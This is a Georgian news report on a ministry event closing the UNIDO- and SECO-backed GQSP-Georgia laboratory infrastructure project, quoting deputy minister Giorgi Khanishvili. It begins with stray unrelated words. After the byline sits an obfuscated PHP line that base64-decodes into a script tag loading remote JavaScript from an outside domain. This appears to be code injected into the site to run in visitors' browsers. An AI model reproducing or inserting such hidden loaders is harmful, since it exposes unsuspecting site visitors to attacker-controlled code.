celsiusi
ავერსი შნაიდერი

გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის პირველმა მოადგილემ, გიორგი ხანიშვილმა „გლობალური ხარისხისა და სტანდარტების პროგრამა საქართველოში“ (GQSP-Georgia) ფარგლებში გამართული დასკვნითი ღონისძიება მისასალმებელი სიტყვით გახსნა. ინფორმაციას გარემოს დაცვისა და სოფლის მეურნეობის სამინისტრო ავრცელებს, ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროდან აცნობეს. 

მათივე ცნობით, ღონისძიება გაეროს ინდუსტრიული განვითარების ორგანიზაციის (UNIDO) ტექნიკური მხარდაჭერითა და შვეიცარიის ეკონომიკურ საქმეთა სახელმწიფო სამდივნოს (SECO) დაფინანსებით მიმდინარე პროექტია.
როგორც გიორგი ხანიშვილმა აღნიშნა, ლაბორატორიული სექტორის განვითარება განსაკუთრებით მნიშვნელოვანია ხარისხიანი ქართული პროდუქციის წარმოებისა და ექსპორტის ზრდისთვის.
„ პროექტის ფარგლებში ჩატარებული სამუშაოები შესაძლებლობას მოგვცემს, კიდევ უფრო განვავითაროთ ლაბორატორიული სისტემა. ქართველ მეწარმეს შესაძლებლობა მიეცემა მიიღოს სრული ლაბორატორიული მომსახურება. მინდა კიდევ ერთხელ აღვნიშნო განხორციელებული პროექტის წარმატება და მადლობა გადავუხადო პროექტის ინიციატორებს, დონორებსა და ყველა ჩართულ მხარეს, რომელთაც შეძლეს ამ სისტემის ჩამოყალიბება. ჩვენ უნდა დავამტკიცოთ, რომ საქართველოს შეუძლია აწარმოოს ხარისხიანი პროდუქცია, დანერგოს მისი კონტროლის სრული ჯაჭვი და ამავე დროს მიაწოდოს მსოფლიოს ჯანსაღი ქართული პროდუქცია", - განაცხადა გიორგი ხანიშვილმა.
გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ცნობით, ღონისძიების ფარგლებში, მონაწილეებმა ჩატარებული სამუშაოები შეაჯამეს, საუბარი შეეხო სამომავლო გეგმებსაც; ასევე, გაეცნენ საქართველოს ლაბორატორიული ინფრასტრუქტურის მდგრადი განვითარების სტრატეგიულ გზამკვლევს, რომელიც აღნიშნული პროექტის ფარგლებში შეიქმნა. გზამკვლევში ასახულია ყველა ის საკითხი და გამოწვევა, რაც დღეს ლაბორატორიების წინაშე არსებობს.
„საქართველოს ლაბორატორიების ინფრასტრუქტურის გზამკვლევის არსებობის ფაქტი მნიშვნელოვანია, როგორც სამინისტროსთვის საერთო პოლიტიკის შემუშავების თვალსაზრისით, ასევე კერძო ლაბორატორიებისთვისაც.
გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ზოგადი მიდგომაა, გააძლიეროს სექტორული ასოციაციები, სახელმწიფო პროგრამების ხელშეწყობით, სწორად განსაზღვროს სამომავლო განვითარების გეგმები, სუსტი და ძლიერი მხარეები.
ღონისძიებას ესწრებოდნენ გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს, სამინისტროს სისტემაში შემავალი სტრუქტურების, შვეიცარიის ეკონომიკურ საქმეთა სახელმწიფო სამდივნოს (SECO), გაეროს ინდუსტრიული განვითარების ორგანიზაციის (UNIDO), საქართველოს ლაბორატორიების ასოციაციის (GeLab) და ფარმაცევტული სექტორის წარმომადგენლები“,- აღნიშნულია ინფორმაციაში.
ავტორი
მირანდა შურღაია
366
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");